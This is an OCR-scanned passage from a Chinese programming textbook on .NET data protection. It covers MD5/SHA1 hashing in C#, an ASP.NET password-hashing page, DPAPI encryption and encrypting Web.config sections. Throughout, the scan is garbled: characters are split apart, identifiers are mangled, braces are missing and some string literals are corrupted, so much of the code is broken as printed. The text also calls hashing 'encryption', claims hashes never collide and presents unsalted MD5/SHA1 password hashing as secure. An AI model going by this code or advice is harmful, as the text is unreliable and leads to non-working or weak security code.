目前 网 络 嗅 探 技 术 非 常 发 达 ， 很 多 数据 都 能 被 黑客 探测 并 且 作 为 下 一 步 攻击 的 基础 。 
黑客 会 专门 嗅 探 目 标 机 流量 里 的 特殊 数据 ， 如 账户 文件 等 ， 通 过 创建 虚拟 硬件 监听 网 卡 的 
数据 包 ， 然 后 分 析 数 据 包 ， 找 出 需要 嗅 探 的 信息 。 


4.2 Hash 算法 


数据 加 密 的 基本 过 程 是 对 原来 为 明文 的 文件 或 数据 按 某 种 算法 进行 处 理 ， 使 其 不 可 
读 ， 通 常 称 为 “ 密 文 ”， 使 其 只 有 在 输入 相应 的 密 钥 之 后 才能 显示 本 来 内 容 ， 通 过 这 样 的 
途径 达到 保护 数据 不 被 非法 人 人 窃取、 阅读 的 目的 。 该 过 程 的 逆 过 程 为 解密 ， 即 将 该 编码 信 
息 转化 为 其 原来 的 数据 。 

用 哈 希 函数 进行 加 密 的 算法 就 称 为 散 列 算法 。 哈 希 函 数 将 任意 长 度 的 二 进 制 字 符 串 映 
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射 为 固定 长 度 的 小 型 二 进 制 字 符 串 。 加 密 哈 希 函数 具有 这 样 的 属性 : 两 个 不 同 的 输入 不 可 
能 具有 相同 的 散 列 值 ， 也 就 是 说 ， 两 组 数据 的 散 列 值 仅 在 对 应 的 数据 也 匹配 时 才 会 匹配 。 
数据 的 少量 更 改 会 在 哈 希 值 中 产生 不 可 预知 的 大 量 更 改 ， 所 以 很 难 从 加 密 后 的 文字 中 找到 
蛛丝马迹 。 

常用 的 散 列 算法 有 MD5 和 SHA1， 下 面 分 别 进 行 介绍 : 


1. MD5 











MDS5 的 全 称 是 信息 -摘要 算法 (Message-Digest Algorithm 5) 在 20 世纪 90 年 代 初 由 
MIT Laboratory for Computer Science 和 Rsa Data Security Inc 的 Ronald 1. Rivest 开发 ， 经 
MD2、MD3 和 MD4 发 展 而 来 。 它 的 作用 是 让 大 容量 信息 在 用 数字 签名 软件 签署 私人 密 匙 
前 被 “压缩 ”成 一 种 保密 的 格式 〈 把 一 个 任意 长 度 的 字 节 串 变 换 成 一 定 长 的 大 整数 ) 。 不 
管 是 MD2、MD4 还 是 MD5， 都 需要 获得 一 个 随机 长 度 的 信息 并 产生 一 个 128 位 的 信息 
摘要 。 

2. SHA1 





SHAI1 的 全 称 是 安全 哈 希 算法 (Secure Hash Algorithm，SHA) ，MD5 算法 的 哈 希 值 
大 小 为 128 位 ， 而 SHA1 算法 的 哈 希 值 大 小 为 160 位 。 两 种 算法 都 是 不 可 逆 的 。 


3. 实例 


下 面 通过 几 个 实例 讲解 MD5 和 SHA1 算法 是 如 何 通过 代码 实现 加 解密 的 : 
(1) MD5 算法 的 安全 命名 空间 代码 如 下 : 


System.Security.Cryptography .MD5 

System.Security.Cryptography .MD5CryptoServiceProvider () 
System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigF 
ile(strSource, "MD5") 


加 密 方法 有 2 种 : 

Q 使 用 new 运算 符 创 建安 全 对 象 , 并 通过 加 密 方法 Get MD5_Methodl 返回 加 密 后 的 
字符 串 。 方 法 直接 使 用 字 节 数组 bytResult 提供 加 密 类 使 用 ， 并 携带 数据 返回 。 代 码 如 下 : 

/**//// <summary> 

/// </summary> 


/// <param name="strSource"> 需 要 加 密 的 明文 </param> 
/// <returns> 返 回 16 位 加 密 结果 , 该 结果 取 32 位 加 密 结果 的 第 7 位 到 17 位 </returns> 
public string Get MD5 Methodl (string strSource) 
{ 
// new 
System.Security.Cryptography.MD5 md5 = new 
System.Security.Cryptography .MD5CryptoServiceProvider(); 
// 获取 密 文 字 节 数组 
byte[] bytResult = md5.ComputeHash (System.Text.Encoding.Default. 
GetBytes (strSource)); 
// 转换 成 字符 串 , 并 取 7 到 17 位 
string strResult = BitConverter.ToString (bytResult, 3,5); 
// 转换 成 字符 串 , 32 位 
// string strResult = BitConverter.ToString (bytResult); 
// BitConverter 转换 出 来 的 字符 串 会 在 每 个 字符 中 间 产 生 一 个 分 隔 符 , 需要 去 除 掉 
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strResult strResult.Replace("—", "™"); 
return strResult; 


1 


/**//// <summary> 


@ 为 适应 不 同 编码 方式 的 加 密 ， 通 过 调用 特定 加 密 算法 抽象 类 上 的 Create 方法 创建 
特定 加 密 算法 。 在 加 密 前 需要 指定 编码 类 型 ， 常 用 的 包括 UTF8，UTF7，Unicode 等 。 具 
体 实现 代码 如 下 : 

/// </summary> 

/// <param name="strSource"> 需 要 加 密 的 明文 </param> 


/// <returns> 返 回 32 位 加 密 结 果 </returns> 


public string Get MD5 Method2 (string strSource) 
{ 


string strResult = ""; 


// Create 


System.Security.Cryptography.MD5 md5 = System.Security.Cryptography. 
MD5 .Create(); 


byte[] bytResult = md5.ComputeHash (System.Text.Encoding.UTF8 .GetBytes 
(strSource)); 


// 字 节 类 型 的 数组 转换 为 字符 串 
for (int i = 0; i < bytResult.Length; i++) 


{ 
// 十 六 进 制 转换 


strResult = strResult + bytResult[i].ToString("X"); 
} 


return strResult; 


@ 为 了 给 指定 密码 和 哈 希 算 法 生成 一 个 适合 于 存储 在 配置 文件 中 的 哈 希 密码 ， 可 以 
直接 使 用 HashPasswordForStoringInConfigFile 创建 一 个 哈 希 密码 值 ， 在 窗 体 身 份 验证 赁 所 
存储 到 应 用 程序 的 配置 文件 时 使 用 ， 实 例 代码 如 下 : 

/// </summary> 

/// <param name="strSource"> 需 要 加 密 的 明文 </param> 

/// <returns> 返 回 32 位 加 密 结果 </returns> 


public string Get MD5 Method3 (string strSource) 
{ 


return 


System.Web.Security.FormsAuthentication.HashPasswordForStoringIn-— 
ConfigFile (strSource, "MD5"); 
| 


(2) 安全 哈 希 算法 主要 适用 于 数字 签名 标准 (Digital Signature Standard，DSS) 里 面 
定义 的 数字 签名 算法 (Digital Signature Algorithm，DSA) 。 对 于 长 度 在 2 一 64 位 之 间 的 消 
息 ，SHAI 会 产生 一 个 160 位 的 消息 摘要 。 当 接收 到 消息 的 时 候 ， 用 这 个 消息 摘要 来 验证 
数据 的 完整 性 。 传 输 的 过 程 中 数据 很 可 能 会 发 生变 化 ， 那 么 就 会 产生 不 同 的 消息 摘要 。 

该 例子 是 以 SHA1 为 例 ， 读 者 需要 熟 记 以 下 安全 命名 空间 : 

System.Security.Cryptography .SHAl 

System.Security.Cryptography.SHAlCryptoServiceProvider() 


System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfig— 
File(strSource, "SHAl1") 
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它 通过 使 用 new 运算 符 创建 安全 对 象 , 并 通过 加 密 方法 Get SHA1 Methodl 返回 加 密 
后 的 字符 串 。 方 法 直接 使 用 字 节 数组 bytResult 提供 加 密 类 使 用 ， 并 携带 数据 返 
SHA1 安全 加 解密 代码 如 下 : 


/**//// <summary> 
/// </summary> 
/// <param name="strSource"> 需 要 加 密 的 明文 </param> 
/// <returns> 返 回 16 位 加 密 结果 , 该 结果 取 32 位 加 密 结 果 的 第 7 一 17 位 </returns> 
public string Get SHA1 Methodl (string strSource) 
{ 
// new 
System.Security.-Cryptography.SHRA1 shal = new 
System.Security.Cryptography .SHAlCryptoServiceProvider (); 
// 获取 密 文字 节 数 组 
byte[] bytResult = shal.ComputeHash (System.Text.Encoding.Default. 
GetBytes (strSource) ) ; 
// 转换 成 字符 串 , 并 取 7 到 17 位 
string strResult = BitConverter.ToString (bytResult, 3,5); 
// 转换 成 字符 串 , 32 位 
// string strResult = BitConverter.ToString (bytResult); 
// BitConverter 转换 出 来 的 字符 串 会 在 每 个 字符 中 间 产 生 一 个 分 隔 符 , 需要 去 除 掉 
strResult = strResult.Replace("-", ""); 
return strResult; 











加 


/**//// <summary> 


需要 特别 注意 密码 和 用 户 名 的 哈 希 处 理 和 存储 。 下 面 的 实例 将 从 安全 的 角度 介绍 如 何 
将 用 户 输入 的 用 户 名 称 和 密码 数据 保存 到 自 定 义 的 配置 文件 中 。 

实例 允许 用 户 选 择 加 密 的 类 型 是 MD5 或 者 SHA1, 并 且 在 对 密码 进行 加 密 时 调用 方法 
HashPasswordForStoringInConfigFile ， 最 终 显 示 配 置 中 包含 用 户 定义 和 哈 希 密码 的 
credentials 节 。 

配置 节 信息 加 密实 例 代 码 如 下 : 


<%@ Page Language="C#" %> 
<!DOCTYPE html]l PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtmll-transitional.dtd"> 
<html > 
<head> 
<title>ASP.NET Example</title> 
<script runat="server"> 
void Cancel Click(object sender,EventArgs e) 
{ 
userName.Text 
password.Text 
repeatPassword.Text = ""; 
result.Text = ""; 
} 
void HashPassword Click(object sender,EventArgs e) 
{ 
if (Page.IsValid) 
{ 





ER 
日 


LL 
了 


string hashMethod = ""; 
if (md5.Checked) 
{ 
hashMethod = "MD5"; 
} 
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else 
{ 
hashMethod = "SHAl"; 


} 
string hashedPassword = FormsAuthentication.HashPasswordFor-— 
StoringInConfigFile 
(password.Text, hashMethod); 
result.Text = "glt;credentials passwordFormat=\"" + hashMethod 
+"\"ggt;<br />" +" 


&lt;user name=\"" + Server.HtmlEncode 
(userName.Text)+ "\" password=\"" +hashedPassword + "\" /&gt;<br 
/>" + "glt;/credentialsggt;"; 
上 
else 
{ 
result.Text = "页 面 有 错误 "; 
} 
} 
</script> 
</head> 
<body> 
<form id="forml" runat="server"> 


<br /> 用 户 名 称 和 密码 被 保存 到 glt;credentials&gt;node 
in the Web.config file.</p> 
<table cellpadding="2"> 
<tbody> 
<tr> 
<td>New User Name:</td> 


<td><asp:TextBox id="userName" runat="server" /></td> 
<td><asp:RequiredFieldValidator id="userNameRequired- 
Validator" 

runat="server" ErrorMessage=" 需 要 用 户 名 " 
ControlToValidate="userName" /></td> 





</tr> 
<tr> 
<td>Password: </td> 


<td><asp:TextBox id="password" runat="server" TextMode="Password" /> 
</td> 


<td><asp:RequiredFieldValidator id="passwordRequired- 
Validator" 
runat="server"” ErrorMessage=" 需 要 密码 " 


ControlToValidate="password" /></td> 
</tr> 


<tr> 
<td>Repeat Password: </td> 
<td><asp:TextBox id="repeatPassword" runat="server" TextMode= 
"Password" /></td> 


<td><asp:RequiredFieldValidator id="repeatPasswordRequired- 
Validator" 
runat="server"” ErrorMessage=" 密 码 确认 " 
ControlToValidate="repeatPassword" /> 
<asp:CompareValidator id="passwordCompareValidator" runat="server" 
ErrorMessage=" 密 码 不 匹配 " 
ControlToValidate="repeatPassword" 


ControlToCompare="password" /></td> 
</tr> 


<tr> 


<td>Hash function:</td> 
<td align="center"> 


<asp:RadioButton id="shal" runat="server" GroupName= 
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"HashType" Text="SHR1"” /> 
<asp:RadioButton id="md5" runat="server" GroupName= 
"HashType™" Text="MD5" /> 
</td> 
<HEr> 
Or 
<td align="center" colspan="2"> 
<asp:Button id="hashPassword" onclick="HashPassword Click" 
runat="server” Text=" 哈 希 密码 " />gnbsp; gnbsp; 
<asp:Button id="cancel" onclick="Cancel Click" runat="server" 
Text=" 取 消 " CausesValidation="false" /> 
</td> 
</tr> 
</tbody> 
</table> 
<pre><asp:Label id="result" runat="server"></asp:Label></pre> 
</form> 
</body> 
</html> 


4.3 利用 操作 系统 的 接口 加 密 


除了 可 以 利用 .NET Framework 进行 信息 保护 外 , 利用 操作 系统 自身 的 API 也 可 以 保护 
用 户 关键 数据 。 需 要 说 明 的 是 ，DPAPI (Data Protection API) 数据 保护 API 技术 分 为 托管 
和 非 托管 两 类 ， 下 面 将 分 别 介绍 它们 的 实现 机 理 。 


1. 托管 型 DPAPI 技 术 


管 型 的 Windows API 利 用 系统 组 件 处 理 加 解密 数据 。 下 面 将 结合 图 3-1 讲解 Windows 

API 原理 和 技术 特点 ， 帮 助 读 者 理解 Windows API 的 重要 作用 ， 以 及 它 和 哈 希 数据 
处 理 的 区 别 。 

在 图 4-1 中 ，Windows API 执行 数据 加 密 事件 的 顺序 分 为 6 个 步骤 ; 

(1) 从 Windows 服务 控制 管理 器 启动 Win32@ 服 务 ， 并 自动 加 载 与 运行 该 服务 的 账户 
关联 的 用 户 配置 文件 ， 允 许 Windows 账户 用 于 运行 企业 服务 应 用 程序 。 

(2) Win32 服务 调用 服务 组 件 的 一 个 启动 方法 ， 该 方法 可 启动 企业 服务 应 用 程序 并 加 
载 服务 组 件 。 

(3) Web 应 用 程序 从 Web.config 文件 中 检索 加 密 字符 串 。 

(4) Web 应 用 程序 调用 服务 组 件 上 的 方法 来 解密 连接 字符 串 。 

(5) 服务 组 件 与 使 用 P/Invoke 的 DPAPI 进行 交互 ， 调 用 Win32 DPAPI 函数 。 

(6) 解密 的 字符 串 返 回 Web 应 用 程序 。 

需要 注意 的 是 ，DPAPI 要 求 使 用 Windows 账户 密码 以 派生 加 密 密 钥 。DPAPI 使 用 的 
账户 是 从 当前 的 线程 令 牌 (如 果 调 用 DPAPI 的 线程 当前 正在 进行 模拟 ) 或 进程 令 牌 获取 。 

车 要 将 DPAPI 和 用 户 存储 结合 使 用 ， 则 加 载 与 该 账户 关联 的 用 户 配 置 文件 。 如 果 将 
ASPNET 应 用 程序 配置 为 模拟 其 调用 方 ，ASP.NET 应 用 程序 线程 会 有 一 个 关联 的 线程 模 
拟 令 牌 。 与 该 模拟 令 牌 关联 的 登录 会 话 作 为 网 络 登 录 会 话 (在 服务 器 上 用 来 表示 调用 方 ) 。 
网 络 登录 会 话 不 会 导致 加 载 用 户 配置 文件 ， 并 且 无 法 从 密码 中 派生 加 密 密 钥 ， 因 为 服务 器 
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没有 被 模拟 的 用 户 的 密码 〈 除 非 应 用 程序 使 用 基本 身份 验证 ) 。 

为 了 消除 这 些 限制 ， 可 以 使 用 企业 服务 器 应 用 程序 中 的 服务 组 件 (具有 固定 的 进程 标 
识 ) ,通过 使 用 DPAPI 提供 加 密 和 解密 服务 。Windows 服务 和 服务 组 件 一 般配 置 为 使 用 具 
有 最 少 权 限 的 相同 账户 运行 ， 因 此 ， 服 务 组 件 可 以 访问 加 载 的 用 户 配 置 文件 ， 同 时 也 可 以 
调用 DPAPI 函数 以 加 密 和 解密 数据 。 
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图 4-1 加 密 流程 


如 果 没 有 从 Windows 服务 中 启动 服务 组 件 (并 且 该 服务 与 之 没有 关联 性 ) ， 系 统 就 不 
会 自动 加 载 用 户 配置 文件 。 虽然 可 以 调用 某 个 Win32 API 以 加 载 用 户 配 置 文件 
(LoadUserProfile) ， 但 是 要 求 调用 代码 是 Administrators 组 的 一 部 分 ， 这 会 违反 使 用 最 少 
权限 运行 的 原则 。 

每 当 调用 服务 组 件 的 Encrypt 和 Decrypt 方法 时 ，Windows 服务 必须 运行 。 在 停止 
Windows 服务 时 ， 就 会 自动 卸载 配置 的 配置 文件 ， 服 务 组 件 中 的 DPAPI 方法 也 停止 工作 。 

下 面 将 通过 实例 具体 讲解 如 何 利 用 DPAPI 托管 代码 类 库 加 解密 安全 数据 。 此 实例 封装 
了 对 Win32 DPAPI 函数 的 调用 。 要 调用 托管 DPAPI 类 库 ， 需 要 首先 添加 名 称 为 
DataProtection.dll 的 程序 集 ， 在 代码 中 添加 下 列 using 语句 : 


using DataProtection; 


实现 加 密 方法 需要 实例 化 加 密 对 象 DataProtector， 调 用 它 的 加 密 方法 Encrypt， 该 方法 
只 需要 直接 传 入 需 加 密 的 字符 串 即 可 。 

Encrypt 方法 代码 如 下 : 

DataProtector dp = new DataProtector (DataProtector.Store.USE USER STORE); 

byte[] cipherText = null; 

try 


cipherText = dp.Encrypt (plainText, null); 





catch (Exception ex) 
{ 


throw new Exception ("Exception encrypting." + ex.Message); 


return cipherText; 
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实现 解密 方法 需要 实例 化 加 解密 对 象 DataProtector， 并 且 调 用 解密 方法 Decrypt 把 传 
入 的 数据 进行 解密 。 
Decrypt 方法 代码 如 下 : 


DataProtector dp = new DataProtector (DataProtector .Store.USE USER _ STORE) 7 
byte[] PlainText = null; 


EE 
{ 
plainText = dp.Decrypt (cipherText, null); 


catch (Exception ex) 
{ 

throw new Exception ("Exception decrypting. " + ex.Message); 
| 


return plainText; 

在 Web 系统 研发 时 ， 很 多 开发 人 员 习 惯 在 Web.Config 中 用 明文 配置 数据 库 连 接 串 。 
这 种 做 法 异常 的 危险 ， 一 旦 被 黑客 获取 该 连接 串 ， 服 务 器 数据 库 的 安全 也 就 无 法 保证 了 。 
下 面 的 实例 说 明 如 何 加 密 和 解密 数据 库 连 接 信息 ， 首 先 ， 打 开 VS2005 以 上 版 本 的 开发 工 
具 ， 创 建 一 个 名 为 DPAPIWeb 的 应 用 程序 项 目 。 
完成 创建 后 ， 添 加 名 称 为 System.EnterpriseServices 的 程序 集 引 用 。 在 设计 模式 下 打开 
页 面 WebForml.aspx， 然 后 创建 如 图 4-2 所 示 的 窗 体 。 该 页 面 使 用 的 控件 包括 文本 框 控 件 
TextBox 和 加 解密 按钮 。 
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图 4-2 加密 流程 


该 实例 的 加 密 按 钮 需要 调用 DataProtectorComp 服务 组 件 对 通过 Web 窗 体 输入 的 数据 
进行 加 密 。 加 密 后 的 数据 显示 在 输入 框 中 ， 有 具体 代码 如 下 : 


DataProtectorComp dp = new DataProtectorComp () 7 
try 


byte[] dataToEncrypt = Encoding.ASCII.GetBytes (txtDataTogncrypt.Text); 
txtEncryptedData.Text = Convert .ToBase64String( 


dp.Encrypt (dataToEncrypt));// 加 密 


catch (Exception ex) 

{ 
lblError.ForeColor = Color.Red; 
lblError.Text = "Exception.<br>" + ex.Message; 
return; 
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} 
lblError.Text = ""; 


解密 按钮 调用 DataProtectorComp 服务 组 件 对 txtEncryptedData 字段 内 包含 的 前 面 已 加 
密 的 数据 进行 解密 ， 单 击 按钮 事件 的 代码 如 下 : 


DataProtectorComp dp = new DataProtectorComp(); 
try 
{i 
byte[] dataToDecrypt = Convert.FromBase64String (txtEncryptedData.Text); 
txtDecryptedData.Text = Encoding.ASCIIT.GetString( 
dp.Decrypt (dataToDecrypt));// 解密 





- 


catch (Exception ex) 


lblError.ForeColor = Color.Red; 
lblError.Text = "Exception.<br>" + ex.Message; 
return; 


|; 
lblError.Text = ""; 


单 击 Build Solution 按钮 后 对 该 实例 进行 编译 。 通 过 运行 页 面 WebForml.aspx 将 文本 
字符 串 输 入 到 Data to Encrypt 字段 ， 然 后 单 击 Encrypt 按钮 加 密 。 该 操作 将 对 COM+ 应 用 
程序 中 的 DataProtector 服务 组 件 进 行 调 用 , 数据 加 密 完成 后 在 Encrypted Data 字段 中 显示 。 
如 果 单 击 Decrypt 按钮 ， 则 原始 文本 字符 串 在 Decrypted Data 字段 中 显示 。 

如 果 要 加 解密 Web.config 配置 文件 中 的 数据 库 连 接 节 ， 则 需要 修改 解密 代码 。 编 辑 解 
密 单 击 按钮 事件 bmDecryptConfig_Click, 并 从 Web.config 文件 的 <appSettings> 读 取 数 据 库 
连接 字符 串 。 

单 击 事件 代码 如 下 : 

DataProtectorComp dec = new DataProtectorComp(); 

try 


string appSettingValue = ConfigurationSettings.AppSettings 
["connectionstring"]; // 读 取 配置 节 
byte[] dataToDecrypt = Convert.FromBase64String (appSettingValue); 
string connSstr = Encoding.ASCII.GetString( 
dec.Decrypt (dataToDecrypt)); // 解密 
txtDecryptedData.Text = connstr; 
} 


catch (Exception ex) 

1 
lblError.ForeColor = Color.Red; 
lblError.Text = "Exception.<br>" + ex.Message; 
return; 

} 

lblError.Text = ""; 


完成 上 述 工作 后 ， 读 者 可 以 尝试 在 Data to Encrypt 字段 中 输入 一 个 如 下 所 示 的 数据 库 
连接 字符 串 : 
server=127.0.0.1;Integrated Security=SSPI; database=testDb 


单 击 加 密 Encrypt 按钮 ， 把 显示 的 加 密 数 据 复制 下 来 ， 复 制 到 配置 文件 Web.config 的 
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设置 节 <appSettings>。 
XML 代码 如 下 : 
<appSettings> 
<add key="connectionString" value=" 在 这 里 填写 加 密 后 的 数据 库 连接 串 "” /> 
</appSettings> 


单 击 “ 解 密 ” 按 钮 ， 发 现 数据 库 连 接 字符 串 已 成 功 地 从 Web.config 文件 读 取出 来 ， 解 
密 的 连接 字符 串 也 已 经 成 功 地 显示 在 Decrypted data 字段 中 。 


2. 非 托管 型 DPAPI 加 密 技术 





非 托 管 代 码 类 提供 对 Microsoft Windows XP 和 更 高 版 本 操作 系统 中 可 用 的 DPAPI 的 访 
问 ， 因 为 操作 系统 提供 的 服务 不 需要 额外 的 库 。 它 提供 了 一 种 使 用 用 户 或 计算 机 凭据 保护 
数据 或 取消 保护 数据 的 方法 。 

该 类 由 两 个 用 于 非 托管 DPAPTI 的 包装 组 成 : Protect 和 Unprotect， 这 两 个 方法 可 用 于 
对 密码 、 密 钥 、 连 接 字 符 串 这 类 数据 进行 保护 或 取消 保护 。 

下 面 的 实例 将 为 读者 讲解 如 何 利用 非 托 管 代码 的 类 创建 加 解密 的 操作 。 加 密 时 调用 对 
象 ProtectedData 的 加 密 方法 Protect， 通 过 数组 的 方法 加 密 数 据 。 解 密 时 调用 对 象 
ProtectedData 的 解密 方法 Unprotect， 通 过 数组 的 方法 解密 数据 。 

实例 代码 如 下 : 


using System; 

using System.Security.Cryptography; 

public class DataProtectionSample 

和 

// 创建 用 户 加 密 的 字 节 数组 
static byte [] s aditionalEntropy = {9,8,7,6,5}; 
public static void Main() 


{ 
// 创建 字 节 数 组 
byte [] secret = {0,1,2,3,4,1,2,3,4}; 


// 加 密 数据 
byte [] encryptedSecret = Protect (secret); 
Console.WriteLine ("The encrypted byte array is: "); 
PrintValues (encryptedSecret); 


// 解密 和 保存 到 数组 
byte [] originalData = Unprotect (encryptedSecret); 
Console.WriteLine("{0}The original data is: ",Environment.NewLine); 
PrintValues (originalData); 
public static byte [] Protect (byte [] data) 
{ 
try 
{ 
// 加 密 数 据 
return ProtectedData.Protect (data,s aditionalEntropy,Data— 
ProtectionScope.CurrentUser); 
y 
catch (CryptographicException e) 
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Console.WriteLine ("数据 未 被 加 密 .") ; 
Console.WriteLine(e.ToString()); 
return null; 


上 


public static byte [] Unprotect (byte [] data) 
{ 
try 
{ 
// 解密 数据 
return ProtectedData.Unprotect (data,s aditionalEntropy,Data-— 
ProtectionScope.CurrentUser ); 加 


catch (CryptographicException e) 
{ 


Console .WriteLine ("数据 未 被 加 密 , 错误 .") ; 
Console.WriteLine(e.ToString()); 
return null; 


ji 


public static void PrintValues (Byte[] myArr) 
f 
foreach (Byte i in myArr) 
Console.Write("\t{0}",i); 
} 


Console.WriteLine(); 


4.4 加 密 XML 文件 


现在 很 多 系统 都 采用 XML 格式 的 文件 保存 配置 信息 ， 这 些 信 息 中 很 多 是 敏感 数据 ， 
一 旦 被 黑客 获取 将 直接 威胁 系统 的 安全 。 本 节 将 从 配置 方法 到 保护 方法 ， 系 统 的 讲解 如 何 
保护 系统 配置 文件 。 

.NET 技术 提供 了 两 种 类 库 保护 配置 文件 : 


1. DataProtectionConfigurationProvider 类 


Windows 数据 保护 提供 程序 DataProtectionConfigurationProvider 使 用 Windows 内 置 的 
密码 学 技术 来 加 解密 配置 节 。 默 认 情 况 下 ， 这 个 提供 程序 使 用 本 机 的 密 钥 。 


2. RsaProtectedConfigurationProvider 类 


RSA 保护 的 配置 提供 程序 RsaProtectedConfigurationProvide 使 用 RSA 公 钥 对 配置 节 加 
密 。 开 发 人 员 需 要 创建 密 钥 容器 ， 用 于 存储 加 解密 配置 信息 的 公 钥 和 私 钥 。 

对 于 Web 系统 开发 , 建议 使 用 RsaProtectedConfigurationProvider 来 技术 保护 配置 文件 。 
因为 它 能 够 在 多 台 服 务 器 上 使 用 同一 个 加 密 配 置 文件 ， 导 出 用 于 数据 加 密 的 加 密 密 钥 ， 并 
在 另 一 台 服 务 器 上 导入 。 
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上 述 两 个 类 库 均 需要 开发 人 员 在 Machine.config 配置 其 属性 ， 主 要 包括 名 称 、 描 述 和 
保护 类 型 。 
Machine.config 相关 配置 节 代码 如 下 : 


<configProtectedData 
defaultProvider="RsaProtectedConfigurationProvider"> 
<providers> 

<add 
name="DataProtectionConfigurationProvider" 
description="Uses DPAPI to encrypt and decrypt" 
useMachineProtection="true" 

keyEntropy="" 
type="DpapiProtectedConfigurationProvider,.. 

/> 

<add 

name="RsaProtectedConfigurationProvider" 
description="Uses RsaCryptoServiceProvider" 
keyContainerName="NetFrameworkConfigurationKey" 
cspProviderName="" 

useMachineContainer="true" 

useOAEP="false" 

type=" RsaProtectedConfigurationProvider,.." 

/> 

</providers> 

</configProtectedData> 


下 面 的 例子 是 加 密 Web 应 用 程序 配置 文件 (如 Web.config 文件 ) 中 的 敏感 信息 〈 包 
括 用 户 名 和 密码 、 数 据 库 连 接 字 符 串 和 加 密 密 钥 ) ， 对 配置 信息 进行 加 密 后 ， 即 使 攻击 者 
获取 了 对 配置 文件 的 访问 ， ee et 从 而 改进 应 用 程序 的 安全 性 。 

例如 ， 未 加 密 的 配置 文件 中 可 能 包含 背 定 用 于 连接 到 数据 库 的 连接 字符 串 的 节 ， 
如 下 面 的 实例 所 示 : 


<configuration> 
<connectionstrings> 
<add name="SqlServer" connectionString="Data Source=localhost; 
Integrated Security=SSPI;Initial Catalog=test Db;" /> 
</connectionStrings> 
</configuration> 


对 保存 连接 字符 串 值 的 配置 文件 进行 加 密 , 在 对 页 进行 请 求 时 , .NET 框架 对 连接 字符 
串 信息 进行 解密 ， 并 使 其 可 供应 用 程序 使 用 。 
加 密 后 的 XML 代码 如 下 面 的 示例 所 示 : 


<configuration> 
<connectionstrings 
configProtectionProvider="RsaProtectedConfigurationProvider"> 
<EncryptedData> 
<KeyInfo xmlns="http:// www.w3.org/2009/09/xmldsig#"> 
<KeyName>RSA Key</KeyName> 
</KeyInfo> 
<CipherData> 
<CipherValue>NNNNN*&sR0iOJoFA4ooxkFxwelVYpTOriwP2mYPR3FU+r6BPfvsqb384po-h 
ivkYyNY7Dm41PgR2bE9F7k6Tbl1LVUFvnou7p7d/YjnhzgHwNWKMqb0MO0t0Y8DOwogkDDXFx-s 
1UxIhtknc+2a7UGtGh6Di3N572qxdfmGfQc7) (MKLK 
</CipherValue> 
</CipherData> 
</EncryptedKey> 
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</KeyInfo> 

<CipherData> 
<CipherValue>TM* (FV9nNOid8pUvdNLYS5I8R7BaEGncjkwYgshW8ClKjrXSM7zeIRmAy/ 
cTaniu8Rfk92KVkEK83+U1Qd+GQ6pycO3eM8DTM5kCyLcEiJaS5XUAQvAKITBNBN6fBXsWr— 
GuEyUDWZYm6Eijl18DqRDb11i+StkBL1HPyyhbnCAsXdz5CaqVuG0obEy2xmnGQ6G3Mzr74- 
j4ifxnyvRq7levA2sBRA41hES5M80Cd5yKEJktcPWZYM99TmyO3KYjtmRW/Ws/XO03z9z1b1K-— 
OhES5Ok/YX1YVO+Uk4/yuZo0Bjk+rErG505YMfRVtxSJ4ee418ZMfp4vOaqzKrSkHPie3zI— 
R7SuVUeYPFZbcV65BKCU1T4EtPLgi8CHu8bMBQOkdWxOnQEIBeY+TerRee/SiBCTrRA8M/n9b- 
PLI1RJkKUb+URiGLoaj+XHym//fmCclAcveKlba6évKrcbqhEjsnY2F522yaTHcc1l+wXUWqif- 
TrSIPhcO+MT1hB1SZjd8dmPgtZUyzcL51DoChyJNNHG*& 

</CipherValue> 
</CipherData> 
</EncryptedData> 
</connectionstrings> 


4.4.1 DpapiProtectedConfigurationProvider 类 


本 小 节 详 细 介 绍 如 何 利用 类 DpapiProtectedConfigurationProvider 实施 配置 文件 的 加 解 
密 。 它 使 用 Windows 数据 保护 API (DPAPI) 对 数据 进行 加 密 和 解密 。DPAPI 
ProtectedConfigurationProvide 类 提供 实例 所 需要 的 type 和 descriptiom\ 属 性 ,以 及 keyName。 
表 4-1 所 示 为 DpapiProtectedConfigurationProvider 类 的 配置 选项 : 


表 4-1 DpapiProtectedConfigurationProvider 的 配置 选项 









属 性 说 明 
type 受 保护 配置 提供 程序 的 类 型 
Description 提供 程序 实例 的 说 明 
应 用 程序 特定 的 值 ， 该 值 包含 在 加 密 密 钥 中 可 以 防止 其 他 应 用 程序 对 加 密 信 





keyEntropy 息 进行 解密 。 有 关 更 多 信息 ， 请 参考 Windows 数据 保护 API (DPAPI) 的 
CryptProtectDat 方法 中 的 OptionalEntropy 参数 

如 果 为 tue， 则 使 用 计算 机 特定 的 保护 ;如 果 为 false， 则 使 用 用 户 账 户 特定 
的 保护 ， 因 此 ， 建 议 使 用 访问 控制 列表 (ACL) 对 加 密 数据 的 访问 进行 限制 。 
有 关 更 多 信息 ， 请 参见 Windows 数据 保护 API (DPAPI) 中 CryptProtectData 
方法 的 dwFlags 参数 的 CRYPTPROTECT LOCAL _ MACHINE 值 


useMachineProtection 





下 面 的 实例 演示 如 何 使 用 标准 的 DpapiProtectedConfigurationProvider 保护 配置 节 或 取 
消 配 置 节 保 护 。 

该 实例 代码 通过 命名 空间 Configuration 读 取 和 写 配置 文件 ， 其 中 加 密 配置 节 的 方法 是 
ProtectConfiguration， 该 方法 的 主要 功能 是 读 取 数 据 库 串 的 配置 节 ConnectionStrings， 并 设 
置 DpapiProtectedConfigurationProvider 加 密 前 所 需要 的 名 称 属性 。 

解密 方法 是 UnProtectConfiguration， 实 现 加 密 配置 节 信 息 的 读 取 并 且 还 原 密 文 信息 。 
该 实例 的 主 函 数 名 称 为 Main， 用 来 调用 加 解密 方法 并 且 在 控制 台 输出 执行 结果 。 

利用 DpapiProtectedConfigurationProvider 类 进行 加 解密 的 实例 代码 如 下 : 


using System; 
using System.Configuration; 





public class UsingDpapiProtectedConfigurationProvider 
{ 
// 保护 连接 串 
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private static void ProtectConfiguration() 
{ 
// Get the application configuration file 
System.Configuration.Configuration config = 
ConfigurationManager .OpenExeConfiguration( 
ConfigurationUserLevel .None); 
// Define the Dpapi provider name. 
string provider ="DataProtectionConfigurationProvider"; 
// 读 取 配 置 节 
ConfigurationSection connStrings =config.ConnectionSstrings; 
if (connStrings != null) 
{ 


